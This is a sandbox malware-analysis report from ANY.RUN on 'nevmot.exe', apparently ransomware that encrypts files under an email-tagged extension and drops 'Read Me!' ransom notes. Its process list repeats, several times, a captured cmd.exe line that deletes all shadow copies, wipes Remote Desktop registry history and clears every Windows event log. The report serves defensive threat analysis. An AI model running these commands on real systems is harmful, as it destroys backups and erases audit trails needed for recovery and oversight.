analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

nevmot.exe

Full analysis: https://app.any.run/tasks/5fcd3416-ac9a-4c9a-aebe-e95787ab4693
Verdict: Malicious activity
Analysis date: May 20, 2022, 15:53:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

A17E17ADA330AD1CF102348130B876D3

SHA1:

C0A3D43F3E8B00B3119B12E0C0F23BE0332C8D2C

SHA256:

D258F26B1C32CD4E15A52D3F8009323E185A96EA78B50EC9C7232C1B970E1365

SSDEEP:

768:W7U7YXIPfvIq8hWWbGO73oKf9P8lYeNXaPA0qu1w9LE7FCICT1zl8DAN74OnSxVW:AJ73aNvqS9MYT1z+DA93nSxStmCbxzr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Deletes shadow copies

      • cmd.exe (PID: 348)
      • cmd.exe (PID: 2240)
      • cmd.exe (PID: 3532)
      • cmd.exe (PID: 3960)
      • cmd.exe (PID: 2456)
      • cmd.exe (PID: 2660)

    • Changes the autorun value in the registry

      • nevmot.exe (PID: 2440)
      • nevmot.exe (PID: 2916)
      • nevmot.exe (PID: 2880)
      • nevmot.exe (PID: 2524)
      • nevmot.exe (PID: 920)
      • nevmot.exe (PID: 4044)

    • Drops executable file immediately after starts

      • nevmot.exe (PID: 2440)
      • nevmot.exe (PID: 2916)
      • nevmot.exe (PID: 2880)
      • nevmot.exe (PID: 2524)
      • nevmot.exe (PID: 920)
      • nevmot.exe (PID: 4044)

  • SUSPICIOUS

    • Checks supported languages

      • nevmot.exe (PID: 2916)
      • nevmot.exe (PID: 2440)
      • nevmot.exe (PID: 2880)
      • nevmot.exe (PID: 2524)
      • nevmot.exe (PID: 920)
      • nevmot.exe (PID: 4044)

    • Reads the computer name

      • nevmot.exe (PID: 2916)
      • nevmot.exe (PID: 2440)
      • nevmot.exe (PID: 2880)
      • nevmot.exe (PID: 2524)
      • nevmot.exe (PID: 4044)
      • nevmot.exe (PID: 920)

    • Starts CMD.EXE for commands execution

      • nevmot.exe (PID: 2440)
      • nevmot.exe (PID: 2916)
      • nevmot.exe (PID: 2880)
      • nevmot.exe (PID: 2524)
      • nevmot.exe (PID: 4044)
      • nevmot.exe (PID: 920)

    • Executable content was dropped or overwritten

      • nevmot.exe (PID: 2916)

    • Drops a file with a compile date too recent

      • nevmot.exe (PID: 2440)
      • nevmot.exe (PID: 2916)
      • nevmot.exe (PID: 2880)
      • nevmot.exe (PID: 2524)
      • nevmot.exe (PID: 920)
      • nevmot.exe (PID: 4044)

  • INFO

    • Checks supported languages

      • vssadmin.exe (PID: 1548)
      • cmd.exe (PID: 348)
      • vssadmin.exe (PID: 1528)
      • cmd.exe (PID: 2240)
      • cmd.exe (PID: 3532)
      • vssadmin.exe (PID: 528)
      • cmd.exe (PID: 3960)
      • vssadmin.exe (PID: 2900)
      • cmd.exe (PID: 2660)
      • cmd.exe (PID: 2456)
      • vssadmin.exe (PID: 1872)
      • vssadmin.exe (PID: 2980)

    • Reads the computer name

      • vssadmin.exe (PID: 1548)
      • vssadmin.exe (PID: 1528)
      • vssadmin.exe (PID: 528)
      • vssadmin.exe (PID: 2900)
      • vssadmin.exe (PID: 1872)
      • vssadmin.exe (PID: 2980)

    • Manual execution by user

      • nevmot.exe (PID: 2440)
      • nevmot.exe (PID: 2880)
      • nevmot.exe (PID: 2524)
      • nevmot.exe (PID: 920)
      • nevmot.exe (PID: 4044)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:01:16 02:07:41+01:00
PEType: PE32
LinkerVersion: 12
CodeSize: 70656
InitializedDataSize: -
UninitializedDataSize: -
EntryPoint: 0xc16b
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 16-Jan-2022 01:07:41

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000F0

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 1
Time date stamp: 16-Jan-2022 01:07:41
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LARGE_ADDRESS_AWARE
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.rdata
0x00001000
0x00013CF2
0x00013E00
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
6.00458

Imports

KERNEL32.dll
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
57
Monitored processes
18
Malicious processes
12
Suspicious processes
0

Behavior graph

Click at the process to see the details
start nevmot.exe cmd.exe no specs vssadmin.exe no specs nevmot.exe cmd.exe no specs vssadmin.exe no specs nevmot.exe cmd.exe no specs vssadmin.exe no specs nevmot.exe cmd.exe no specs vssadmin.exe no specs nevmot.exe nevmot.exe cmd.exe no specs cmd.exe no specs vssadmin.exe no specs vssadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2916"C:\Users\admin\Desktop\nevmot.exe" C:\Users\admin\Desktop\nevmot.exe
Explorer.EXE
User:
admin
Integrity Level:
MEDIUM
2240"C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"C:\Windows\system32\cmd.exenevmot.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1548vssadmin.exe Delete Shadows /All /QuietC:\Windows\system32\vssadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2440"C:\Users\admin\Desktop\nevmot.exe" C:\Users\admin\Desktop\nevmot.exe
Explorer.EXE
User:
admin
Integrity Level:
MEDIUM
348"C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"C:\Windows\system32\cmd.exenevmot.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1528vssadmin.exe Delete Shadows /All /QuietC:\Windows\system32\vssadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2880"C:\Users\admin\Desktop\nevmot.exe" C:\Users\admin\Desktop\nevmot.exe
Explorer.EXE
User:
admin
Integrity Level:
MEDIUM
3532"C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"C:\Windows\system32\cmd.exenevmot.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
528vssadmin.exe Delete Shadows /All /QuietC:\Windows\system32\vssadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2524"C:\Users\admin\Desktop\nevmot.exe" C:\Users\admin\Desktop\nevmot.exe
Explorer.EXE
User:
admin
Integrity Level:
MEDIUM
Total events
1 063
Read events
1 009
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
7 205
Text files
46
Unknown types
377

Dropped files

PID
Process
Filename
Type
2916nevmot.exeC:\MSOCache\All Users\{90140000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.xml.[[email protected]]binary
MD5:3D27EBED517ED522F2B733AB8BF3A5F2
SHA256:CD8938AF036EAD57709F97A58FCDC6E294AE357E4EF31DAA72663AC39D7DAF20
2916nevmot.exeC:\MSOCache\All Users\{90140000-0015-0410-0000-0000000FF1CE}-C\AccessMUI.xml.[[email protected]]binary
MD5:AAECCA85F4D31C2747442AD6D6494151
SHA256:C50B3936394A03E1ED65F1D9F817D241E87DBD847450852726D066EA4FB69007
2916nevmot.exeC:\MSOCache\All Users\{90140000-0015-0407-0000-0000000FF1CE}-C\Setup.xml.[[email protected]]binary
MD5:9D7415ABCB230A140DE0758FD2F2AD43
SHA256:103116350C0D57F5EDFFA147860B349D66FC2F350B7454ACE09E7D9DB72F00EB
2916nevmot.exeC:\MSOCache\All Users\{90140000-0015-0410-0000-0000000FF1CE}-C\Setup.xml.[[email protected]]binary
MD5:C1809DA86137EC9FD55AF35E34320D69
SHA256:E06EDC57A9B4E90C369EB03617292F40E7F43F416EFBBBBA5AB6EAA681EECA1D
2916nevmot.exeC:\MSOCache\All Users\{90140000-0015-0411-0000-0000000FF1CE}-C\Read Me!.HtAhtm
MD5:19580F021FBEF5BB67EDB2A58B7D238C
SHA256:EC1EA31DAFBDBDA64E8AD201F8A5C9515C0C599124F51C748DCC110D5793F1D8
2916nevmot.exeC:\MSOCache\All Users\{90140000-0015-0411-0000-0000000FF1CE}-C\branding.xml.[[email protected]]binary
MD5:F4EA1B261D9651ABC93A79B1F8C0DDE1
SHA256:B37F6B81E2F1474D2A90F4E1565C40A537C1A2BEAD4A2C05FBF9BED4BFE34486
2916nevmot.exeC:\Users\admin\AppData\Local\nevmot.exeexecutable
MD5:A17E17ADA330AD1CF102348130B876D3
SHA256:D258F26B1C32CD4E15A52D3F8009323E185A96EA78B50EC9C7232C1B970E1365
2916nevmot.exeC:\MSOCache\All Users\{90140000-0015-040C-0000-0000000FF1CE}-C\Setup.xml.[[email protected]]binary
MD5:EDC7C8907212BF551A14617940A110B6
SHA256:CFBE004FD5D816DD8278B247A0153E8307B64B3BA74B2EF8DD7F0AB15CD0BB25
2916nevmot.exeC:\MSOCache\All Users\{90140000-0015-0410-0000-0000000FF1CE}-C\Read Me!.HtAhtm
MD5:19580F021FBEF5BB67EDB2A58B7D238C
SHA256:EC1EA31DAFBDBDA64E8AD201F8A5C9515C0C599124F51C748DCC110D5793F1D8
2916nevmot.exeC:\MSOCache\All Users\{90140000-0015-040C-0000-0000000FF1CE}-C\AccessMUI.xml.[[email protected]]binary
MD5:FB82548B67BDAD9193946FB44D7BD8FB
SHA256:FA452F9EDB05C3BBE44310A5C5987FBA2E29DBF0F9AD6E3DA88EF17323776E2D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
nevmot.exe